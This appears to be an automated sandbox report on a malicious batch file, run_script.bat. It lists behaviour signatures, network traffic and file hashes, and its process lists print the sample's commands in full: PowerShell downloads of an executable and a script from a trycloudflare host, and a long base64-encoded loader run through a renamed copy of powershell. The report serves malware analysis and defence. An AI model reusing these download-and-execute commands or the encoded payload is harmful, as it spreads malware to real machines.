Analysis Overview
SHA256
ddf7f8e12308ee481e883416af7cc1a19e7ce5feee7a69b3267f9d40480fe7b6
Threat Level: Known bad
The file run_script.bat was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Executes dropped EXE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 11:27
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 11:27
Reported
2024-11-13 11:29
Platform
win7-20240903-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\run_script.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
Network
Files
memory/2468-4-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp
memory/2468-5-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2468-7-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
memory/2468-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp
memory/2468-8-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
memory/2468-10-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
memory/2468-9-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
memory/2468-11-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
memory/2468-12-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 4222af73b1775a156ec77fb80b99f0fb |
| SHA1 | fc823804ca071b6d011bf647064fa6e40ecfd4cd |
| SHA256 | 5f19d3970796ae6453315c3dc837ea68f11e949c1017012ea695e1206ccaa3ae |
| SHA512 | 26fabd321d73ec1a2e21ee4c869155f918c83a98869017f11d105ab6caedd42613742dc27cda8da9d604fb6206efeaa158526b376f629ed8fee59bea16e9ad22 |
memory/2952-18-0x000000001B4A0000-0x000000001B782000-memory.dmp
memory/2952-19-0x0000000001D00000-0x0000000001D08000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 11:27
Reported
2024-11-13 11:29
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
137s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\system32\wscript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\run_script.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe
"C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe" powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs"
C:\Windows\system32\cmd.exe
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe" /Y
C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe
"C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe" -enc JABHAGwAYgBiAHcAZgBoAGkAZAB2AGEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATQB4AGQAZwB0AHIAagB1AGMAYwBjACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQARwBsAGIAYgB3AGYAaABpAGQAdgBhACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFEAbABxAGkAaQBjAHIAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAE0AeABkAGcAdAByAGoAdQBjAGMAYwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAVwBoAGoAbAB2AHQAYQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABRAGwAcQBpAGkAYwByAHQAbwAgACkAOwAkAE4AYgBtAHEAZwBrAGkAdgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATABoAGQAaABoAGwAdgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABXAGgAagBsAHYAdABhAHQALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEwAaABkAGgAaABsAHYALgBDAG8AcAB5AFQAbwAoACAAJABOAGIAbQBxAGcAawBpAHYAIAApADsAJABMAGgAZABoAGgAbAB2AC4AQwBsAG8AcwBlACgAKQA7ACQAVwBoAGoAbAB2AHQAYQB0AC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQBsAHEAaQBpAGMAcgB0AG8AIAA9ACAAJABOAGIAbQBxAGcAawBpAHYALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFEAbABxAGkAaQBjAHIAdABvACkAOwAgACQAUwBuAGEAdgBxAHgAdAB2ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAUQBsAHEAaQBpAGMAcgB0AG8AKQA7ACAAJABMAGsAaABvAHoAZABmAHEAcQB6AGsAIAA9ACAAJABTAG4AYQB2AHEAeAB0AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABMAGsAaABvAHoAZABmAHEAcQB6AGsALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEwAawBoAG8AegBkAGYAcQBxAHoAawAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | visits-marie-dial-feet.trycloudflare.com | udp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.231.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | visits-marie-dial-feet.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/4704-0-0x00007FFFA5FC3000-0x00007FFFA5FC5000-memory.dmp
memory/4704-6-0x0000029933870000-0x0000029933892000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wow5m3lp.dx5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4704-11-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
memory/4704-12-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
memory/4704-16-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/1836-18-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
memory/1836-19-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
memory/1836-29-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7ab00d2b8ad3a0a8426f6a535086b700 |
| SHA1 | 5b912f4345328372093354ff2ba6a932fef4a8ab |
| SHA256 | cc27d1633ff5a4401c75569e6cd8f98e7ab09f01b8dfb0399f82efe197e0ca0c |
| SHA512 | 839e5fbdcc406cee2f37a156ccbb772a80a0231508a7925f95e162990b31ea8366442fcd6073c9035905b47a34d60a3434cc776babf9d49521663b8d3e400584 |
C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1836-34-0x00007FFFA5FC0000-0x00007FFFA6A81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8356d1901292ab1c540c91fc5a566e1 |
| SHA1 | 43f7ebcae8fd258f2e704dceea5d279e228469de |
| SHA256 | 90af996df16e4574d32f3bd46cdedef8d4c8b2595accbb224b411320068bb7b9 |
| SHA512 | e54b149b66a89a736aa9f626358077072941eb210e220e6fe4550be1d124b0c28d2c5c1726ce3ef45e38a280567df3235555773a84a2d1e1e463582c2c1a366e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a9725150c8400bf8023c6671a37eb561 |
| SHA1 | 4cd6ddf574e66e050bcff972c4fa589a5681d489 |
| SHA256 | 4b732ad5f05c545c9b5dab1ede2a28a905420916e959adf134883472d6549849 |
| SHA512 | add22f987e004d6a69be0e7f295ae9af797e3506755e32e11b6f01de8b2a551a28b174f0a04fb18afa671060638b533b7de944cd69056999e223cda6da91a45f |
C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe
| MD5 | e897cfb1731bc4c02fbd563788ce1275 |
| SHA1 | 74645248152ed5c29a80da620cb7d2707f5dc3c8 |
| SHA256 | 4ae7b909888f9609760754e021f4277680f915d8bd56207b9e589bf4314ebdaf |
| SHA512 | 2f3249747a16d9c72bfcc4abc8e4bb49940350b38fec45971d2b6092299ca6ba8ebb8b12d92e67c0de33298dca3d977f5f1e4d83fb391bd09ffeda69b351647e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ecfad053723f0fcfa5277e7f671671ac |
| SHA1 | 5cae19229a7a728cc4906ef4d7dedf518922cbad |
| SHA256 | 04b65887a9f0eefb8ec5b26bf1db84cd2296ca1a567c02ebaab1e3e8b660db6a |
| SHA512 | 319840d9b514b3f43e79cf3fe18b87e3e3478eceed8a7c27253f4a864e43fda2c49231284219e86bd4975b61c971fc60856eed8f7314e398b88798feeef71554 |
C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1
| MD5 | d3bdd166f49c5b37636eb5b6b4993a4c |
| SHA1 | b88e949bd3da41e95c53e4bacbeb80eebedf7c84 |
| SHA256 | 12828ef571dd470d640d01d43d6633ca26451363fbb051b229b1fcd607ffabd3 |
| SHA512 | 5b393fd5fa94ca832ef337aca23f446a3166526dd6dfd9c885b9995424cf37e0494de98ef3755cf3ea97dcf99b7cc6652f685396cfd2751b8d1837c06e19e304 |
memory/5052-74-0x000002747CA90000-0x000002747CC52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs
| MD5 | f1ca0c7256a310623187a8a12afc0d69 |
| SHA1 | 6c8d587f756b9ecdfec1e4ac2fca23669fe54a55 |
| SHA256 | fcfd5a286406b4b7890106cd0f477c54c82e33adad15da91e7c69ab58d671b3f |
| SHA512 | e947d90e1fde8118da7f807d52f9c9b3a013a84785c327ac311c481e25e2aaf986fafde3ad7ad80350e2085cad420ea0b9325b9e0e2c75e3843acea7ee1bad2d |
C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs
| MD5 | 84c74bd0c10be16a52e54848ffa7f34d |
| SHA1 | 2eec57a1371c9bfbf69c9bbb265cfe2371338cfc |
| SHA256 | 30b571975bdf3155e07ce09bccac43f7dad05ed7ac8fba5de86d2d07dfd5bece |
| SHA512 | 5c8deaf26c3af928b2d284affffdd60d95ee67998f97b46d4ca004d1d4fa86a64d586574eebb6274e3ed46e035cd02303df940d194ac0010dc4ae5da90a15e69 |
C:\Users\Admin\AppData\Local\Temp\reconstructed_script.vbs.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/3112-110-0x0000000002810000-0x0000000002846000-memory.dmp
memory/3112-111-0x0000000004EE0000-0x0000000005508000-memory.dmp
memory/3112-112-0x0000000004E40000-0x0000000004E62000-memory.dmp
memory/3112-113-0x0000000005510000-0x0000000005576000-memory.dmp
memory/3112-114-0x0000000005580000-0x00000000055E6000-memory.dmp
memory/3112-124-0x00000000057B0000-0x0000000005B04000-memory.dmp
memory/3112-125-0x0000000005DE0000-0x0000000005DFE000-memory.dmp
memory/3112-126-0x0000000005E30000-0x0000000005E7C000-memory.dmp
memory/3112-127-0x0000000006F50000-0x0000000006FE6000-memory.dmp
memory/3112-128-0x0000000006EE0000-0x0000000006EFA000-memory.dmp
memory/3112-129-0x0000000006FF0000-0x0000000007012000-memory.dmp
memory/3112-130-0x00000000075D0000-0x0000000007B74000-memory.dmp
memory/3112-131-0x0000000008200000-0x000000000887A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0ff0a78b0521dfc375c4d78525b8f265 |
| SHA1 | c5d6bc71f293c137af7aad17f950cbc59da2abb8 |
| SHA256 | 5e5af018d697b29c49202462dfc0c41f4d46c340ca3a00cb987e55a6b04ad531 |
| SHA512 | 9740c28c5f09e2ebe5ef825dabe91af6868e0a0d612064cc1a43936f5d87d3452e35ce87d7f5a0887c142e53e04d1d8462744322a13577aff83d0b4f55171d70 |